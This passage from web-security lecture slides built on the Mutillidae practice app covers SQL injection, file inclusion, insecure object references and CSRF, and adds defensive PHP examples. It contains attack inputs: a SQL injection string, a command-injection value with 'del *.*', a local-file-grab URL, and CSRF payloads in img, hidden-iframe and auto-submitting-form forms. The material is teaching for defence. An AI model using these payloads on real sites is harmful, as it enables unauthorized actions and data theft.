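// --- Demo on constructed data. Least privilege would also apply here: the
// web app's database account needs SELECT on accounts, not DROP or FILE.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE accounts (cid INTEGER PRIMARY KEY, username TEXT, password TEXT)');
$db->exec("INSERT INTO accounts (username, password) VALUES ('adrian', 'somepassword')");

var_dump(findAccount($db, 'adrian', 'somepassword') !== null);           // bool(true)
var_dump(findAccount($db, 'adrian', "somepassword' or 1=1 -- ") !== null); // bool(false): just a wrong password now

try {
    lookupHost('irongeek.com && del *.*');   // rejected before any shell is involved
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), "\n";             // "Not a valid host name"
}
// lookupHost('irongeek.com') would run the real lookup; it needs network access.
```

The second `findAccount` call is the interesting one: the slide-15 payload arrives intact but is matched against the password column as a literal string, so the `or 1=1 --` never reaches the SQL parser. The error handling also follows slide 17's "avoid detailed error messages": the caller sees a generic validation error, not the shell's or database's own message.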
  • 18.
Code vulnerable to remote file inclusion (RFI) allows attackers to include hostile code and data, resulting in devastating attacks, such as total server compromise. Malicious file execution attacks affect PHP, XML and any framework which accepts filenames or files from users.
  • 19.
- Grabbing a local file: http://target.hak/index.php?page=source-viewer.php&php_file_name=config.inc
- Tamper Data, POST data and an inadvertent proxy
  • 20.
- Tamper Data Firefox Plugin: https://addons.mozilla.org/en-US/firefox/addon/966
- Paros: http://www.parosproxy.org/index.shtml
- WebScarab: http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project
  • 21.
- Strongly validate user input using "accept known good" as a strategy
- Add firewall rules to prevent web servers making new connections to external web sites and internal systems.
- Consider implementing a chroot jail or other sandbox mechanisms.
- PHP: Disable allow_url_fopen and allow_url_include in php.ini and consider building PHP locally to not include this functionality.
- PHP: Disable register_globals and use E_STRICT to find uninitialized variables.
- PHP: Ensure that all file and streams functions (stream_*) are carefully vetted.
  • 22.
A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, database record, or key, as a URL or form parameter. Attackers can manipulate those references to access other objects without authorization.
  • 23.
- You already saw it with the malicious file include demo.
  • 24.
- Avoid exposing your private object references to users whenever possible, such as primary keys or filenames.
- Validate any private object references extensively with an "accept known good" approach.
- Verify authorization to all referenced objects.
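Slides 21 and 24 share one fix, so here is one added example covering both (my code, not Mutillidae's): the `page=` parameter from the slide-19 demo is treated as a key into a fixed map instead of a file name, and a record id from a form is validated as an integer and then checked for ownership in the query itself. The `pages/` directory, the `blog` table with its `owner_id` column, and the helper names are assumptions; `allow_url_include=Off` in php.ini is the matching server-side setting from slide 21:

```php
<?php
// Added example, not from the slides: "accept known good" handling of the
// two references the demo abused, the page= include and a record id.
declare(strict_types=1);

// 1. File include. The URL parameter is a short key, never a path. The map
//    is the entire universe of includable files; anything else is refused.
//    Together with allow_url_include=Off, no client-chosen local or remote
//    file can reach include().
const PAGES = [
    'home'  => 'home.php',
    'blog'  => 'add-to-your-blog.php',
    'login' => 'login.php',
];

function resolvePage(string $key): ?string
{
    if (!array_key_exists($key, PAGES)) {
        return null;                          // unknown key: refuse, do not "fix up"
    }
    $base = realpath(__DIR__ . '/pages');     // the only directory we include from (assumed)
    $file = ($base === false) ? false : realpath($base . '/' . PAGES[$key]);
    // Belt and braces: even a trusted map entry must resolve inside $base.
    if ($base === false || $file === false
        || strpos($file, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $file;
}

// 2. Direct object reference. The id is validated as a positive integer,
//    and the query enforces ownership, so editing the id in the form still
//    only reaches rows that belong to the logged-in user (slide 24's
//    "verify authorization to all referenced objects").
function loadOwnBlogEntry(PDO $db, string $rawId, int $sessionUserId): ?array
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }
    $stmt = $db->prepare(
        'SELECT id, owner_id, body FROM blog WHERE id = :id AND owner_id = :owner'
    );
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->bindValue(':owner', $sessionUserId, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// --- Demo on constructed data (in-memory SQLite).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE blog (id INTEGER PRIMARY KEY, owner_id INTEGER, body TEXT)');
$db->exec("INSERT INTO blog (owner_id, body) VALUES (1, 'mine'), (2, 'someone else')");

var_dump(resolvePage('../../config.inc'));          // NULL: not a key in the map
var_dump(resolvePage('source-viewer.php'));         // NULL: file names are not keys either
var_dump(loadOwnBlogEntry($db, '1', 1)['body']);    // string(4) "mine"
var_dump(loadOwnBlogEntry($db, '2', 1));            // NULL: exists, but belongs to user 2
var_dump(loadOwnBlogEntry($db, '2 OR 1=1', 1));     // NULL: fails integer validation
```

Two design points worth noting. `resolvePage` never reports why a key was refused, so a probing client cannot distinguish "no such key" from "exists but outside the base directory". And the ownership check lives in the SQL `WHERE` clause rather than in PHP after the fetch, so there is no window in which the foreign row is loaded and then forgotten to be checked.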
  • 25.
A CSRF attack forces a logged-on victim's browser to send a pre-authenticated request to a vulnerable web application, which then forces the victim's browser to perform a hostile action to the benefit of the attacker. CSRF can be as powerful as the web application that it attacks.
  • 26.
[Diagram: Target Web App, Client, Website the attacker controls]
1. Session established with web app via a cookie (already logged in).
2. At some later point, content that the attacker controls is requested.
3. Attacker serves up content that asks the client’s browser to make a request.
4. Client makes the request, and since it already has a session cookie, the request is honored.
  • 27.
- Let’s visit a page with this lovely link:
  <img src="http://target.hak/index.php?page=add-to-your-blog.php&input_from_form=hi%20there%20monkeyboy">
- Don’t want to use a bad image? Try an iframe:
  <iframe src="http://target.hak/index.php?page=add-to-your-blog.php&input_from_form=hi%20there%20monkeyboy" style="width:0px; height:0px; border: 0px"></iframe>
- Can’t use the GET method? Try something like:
  <html>
  <body>
  <form name="csrfform" method="post" action="http://target.hak/index.php?page=add-to-your-blog.php">
  <input type='hidden' name='input_from_form' value="Test of auto submitted form.">
  </form>
  <script>document.csrfform.submit()</script>
  </body></html>
  • 28.
- CSRF Flaws Found On Major Websites, Including a Bank: http://it.slashdot.org/article.pl?sid=08/09/30/0136219
- CSRF Home Router Fun: http://www.gnucitizen.org/blog/persistent-xss-and-csrf-on-wireless-g-adsl-gateway-with-speedbooster-wag54gs/
- CSRF in Gmail: http://www.gnucitizen.org/blog/google-gmail-e-mail-hijack-technique/
  • 29.
- For sensitive data or value transactions, re-authenticate or use transaction signing to ensure that the request is genuine.
- Do not use GET requests (URLs) for sensitive data or to perform value transactions (see next point).
- POST alone is insufficient protection.
- Consider adding CAPTCHAs and extra session values as hidden form elements.
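The last bullet, "extra session values as hidden form elements", implemented as an added example (not Mutillidae's code; helper names are mine). A random token is created once per session, rendered into every state-changing form, and compared in constant time on the receiving side. The demo replays the slide-27 auto-submitting form against it: that form can carry `input_from_form`, but it cannot carry a token it has never seen, because same-origin policy keeps the attacker's page from reading the victim's form. The `$session` array stands in for `$_SESSION` so the script runs from the CLI:

```php
<?php
// Added example, not from the slides: per-session anti-CSRF token for the
// add-to-your-blog form, per slide 29's hidden-form-value bullet.
declare(strict_types=1);

// Create the token once per session. random_bytes() is CSPRNG-backed, and
// the value lives only server-side in the session, so an attacker's page
// cannot read it. Regenerate it (and the session id) at login.
function csrfToken(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Hidden field for every state-changing form. The form must use POST: the
// slide says POST alone is insufficient, but a token in a GET URL would
// leak through Referer headers, logs and browser history.
function csrfField(array &$session): string
{
    $t = htmlspecialchars(csrfToken($session), ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<input type="hidden" name="csrf_token" value="' . $t . '">';
}

// Receiving side. hash_equals() is constant-time, so the comparison does not
// leak the token byte by byte. Missing or wrong token means the request did
// not come from a form this application rendered for this session.
function csrfCheck(array $session, array $post): bool
{
    $expected = $session['csrf_token'] ?? '';
    $given    = $post['csrf_token'] ?? '';
    return is_string($expected) && is_string($given)
        && $expected !== '' && hash_equals($expected, $given);
}

// --- Demo with a constructed session array (use $_SESSION in a web app).
$session = [];
echo csrfField($session), "\n";     // what the real form would carry

// Slide 27's auto-submitting form only knows the field name, not the token:
$forged = ['input_from_form' => 'Test of auto submitted form.'];
var_dump(csrfCheck($session, $forged));      // bool(false): refused

// A submission from the form we rendered carries the matching token:
$legit = ['input_from_form' => 'hi there', 'csrf_token' => $session['csrf_token']];
var_dump(csrfCheck($session, $legit));       // bool(true)

// A guessed token of the right length and format is still refused:
$tampered = $legit;
$tampered['csrf_token'] = str_repeat('0', 64);
var_dump(csrfCheck($session, $tampered));    // bool(false)
```

In the handler, refuse the whole request when `csrfCheck($_SESSION, $_POST)` is false, before any database write. The slide's first bullet still applies on top of this: for the transactions that matter most, ask for the password again or sign the transaction, since a token only proves the request came through your form, not that the user meant it.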
  • 30.
- Deliberately Insecure Web Applications For Learning Web App Security: http://www.irongeek.com/i.php?page=security/deliberately-insecure-web-applications-for-learning-web-app-security
  • 31.
- SamuraiWTF: http://samurai.inguardians.com/
- OWASP Live CD: http://www.owasp.org/index.php/Category:OWASP_Live_CD_Project
- BackTrack: http://www.remote-exploit.org/backtrack.html
  • 32.
- Free ISSA classes
- ISSA Meeting: http://issa-kentuckiana.org/
- Louisville Infosec: http://www.louisvilleinfosec.com/
- Phreaknic/Notacon/Outerz0ne: http://phreaknic.info http://notacon.org/ http://www.outerz0ne.org/